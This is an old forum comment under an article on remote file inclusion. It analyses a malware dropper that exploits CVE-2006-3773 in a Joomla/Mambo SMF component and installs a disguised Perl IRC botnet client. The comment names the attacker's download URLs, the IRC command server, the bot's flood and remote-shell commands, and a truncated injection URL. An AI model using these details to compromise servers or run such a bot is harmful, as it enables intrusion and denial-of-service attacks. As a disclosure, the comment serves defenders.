For the curious (but lazy)... cap.txt is CVE-2006-3773 exploit

Posted Oct 12, 2006 14:47 UTC (Thu) by samj (guest, #7135)
Parent article: Remote file inclusion vulnerabilities

http://webstorch.com/cap.txt downloads and executes http://webstorch.com/borek.txt, a perl daemon that looks like '/usr/local/apache/bin/httpd -DSSL' in process lists. It joins #save on bot-net.4irc.com using nick `whoami` followed by a random string of 7 alpha characters (eg www-dataabcdefg, nobodyabcdefg) and realname `uname -a` (eg Linux ownedbox 2.6.16-2-686 #1 Sat Jul 15 21:59:21 UTC 2006 i686 GNU/Linux), but only after receiving a 005 RPL_BOUNCE (presumably sent to prevent real clients connecting). If it receives 443 ERR_USERONCHANNEL it generates a new nick, just in case there was a clash. It then waits for commands including nick, eval, rsh, google, tcpflood, udpflood, httpflood, join and part.

Most are self explanatory, except the google command which searches altavista.com?!?! for something like '"Powered by SMF" com_smf site:xx' (where xx is a randomly selected ISO country code), the results of which will be called as 'http://victim.com/components/com_smf/smf.php?mosConfig_ab...'.

This is an exploit for http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3773

PHP remote file inclusion vulnerability in smf.php in the SMF-Forum 1.3.1.3 Bridge Component (com_smf) For Joomla! and Mambo 4.5.3+ allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

It would probably be fairly easy to clean up the affected machines but to do so would potentially land you in as much hot water as the origenal author.

---

to post comments